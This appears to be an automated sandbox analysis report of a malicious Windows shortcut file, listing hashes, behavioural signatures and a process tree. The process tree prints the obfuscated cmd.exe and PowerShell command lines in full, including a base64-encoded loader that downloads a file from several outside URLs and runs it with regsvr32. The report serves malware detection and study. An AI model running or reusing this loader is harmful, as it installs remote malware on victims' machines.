Analysis
- max time kernel: 122s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20241023-en
- resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
- submitted: 13-11-2024 11:03
Static task: static1
Behavioral task: behavioral1
- Sample: b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
- Resource: win7-20241023-en
Behavioral task: behavioral2
- Sample: b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
- Resource: win10v2004-20241007-en
General
- Target: b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
- Size: 2KB
- MD5: fbddf679b584e0f043673397d8642215
- SHA1: d1e2a9b2591560b075626140a51f3abbdce61a74
- SHA256: b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55
- SHA512: 7159c50d5532c69b526043ebacb1ccc8690823b67e45422263b9a2dd736ddb50020e136b3d8bf6f1ac95f92901f62de81f778da8fb1120c6c76b594e045d5ff2
Malware Config
Signatures
- An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  Processes:
    pid   Process
    1988  cmd.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses 1 IoCs
  Processes:
    pid   Process
    1636  powershell.exe
- Suspicious use of AdjustPrivilegeToken 1 IoCs
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  1636  powershell.exe
- Suspicious use of WriteProcessMemory 6 IoCs
  Processes:
    description                       pid   Process  procid_target
    PID 1644 wrote to memory of 1988  1644  cmd.exe  31
    PID 1644 wrote to memory of 1988  1644  cmd.exe  31
    PID 1644 wrote to memory of 1988  1644  cmd.exe  31
    PID 1988 wrote to memory of 1636  1988  cmd.exe  32
    PID 1988 wrote to memory of 1636  1988  cmd.exe  32
    PID 1988 wrote to memory of 1636  1988  cmd.exe  32
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
  - Suspicious use of WriteProcessMemory
  PID: 1644
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: "C:\Windows\system32\cmd.exe" /v:on /c FNBmwxR6QxBkrgJ+BX6Miv/JjezYHuOEw18Vc+d4q4lm2Szx6nmR8zgeg19If6ewK09230Kh||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Br='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';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID: 1988
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell.exe -c "&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1636